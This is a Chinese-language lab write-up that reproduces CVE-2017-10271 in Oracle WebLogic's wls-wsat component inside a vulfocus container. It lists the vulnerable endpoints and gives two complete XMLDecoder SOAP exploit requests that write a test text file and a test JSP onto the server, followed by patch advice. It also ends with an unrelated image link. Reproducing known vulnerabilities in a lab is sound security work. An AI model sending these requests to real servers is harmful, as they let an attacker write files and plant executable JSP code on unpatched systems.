Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271 已亲自复现
- 漏洞名称
- 漏洞描述
- 影响版本
- 漏洞复现
- 环境搭建
- 漏洞利用
- 修复建议
漏洞名称
漏洞描述
在Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.3/2.2.1/1.10/12.2.1.1/22.0(Application Server Soft ware)中发现了一个被归类为非常严重的漏洞。这会影响组件WLS Security的未知代码。
影响版本
Oracle Weblogic_Server 12.2.1.1.0
Oracle Weblogic_Server 10.3.6.0.0
Oracle Weblogic_Server 12.1.3.0.0
Oracle Weblogic_Server 12.2.1.2.0
漏洞复现
环境搭建
受害者IP:192.168.63.129:53342
攻击者IP:192.168.63.1
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
启动vulfocus
docker-compose up -d
环境启动后,访问http://192.168.63.129:53342即可看到一个404页面,说明已成功启动。
漏洞的URL
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1
访问路径/wls-wsat/CoordinatorPortType,出现下图所示页面说明可能存在漏洞。
漏洞利用
上传test.txt文件尝试一下
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
访问URL:http://192.168.63.129:57677/wls-wsat/test.txt
上传test.jsp尝试一下
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.63.129:57677
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 677
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println">
<string><![CDATA[ <% out.print("test"); %> ]]></string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
访问路径:http://192.168.63.129:57677/bea_wls_internal/test.jsp
修复建议
目前官方已有可更新版本,建议受影响用户升级至最新版本。
补丁链接:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
![3.[BUUCTF HCTF 2018]WarmUp1](https://img-blog.csdnimg.cn/direct/1c0a84bea02d4cb99c2fb86cf56b1f81.png)
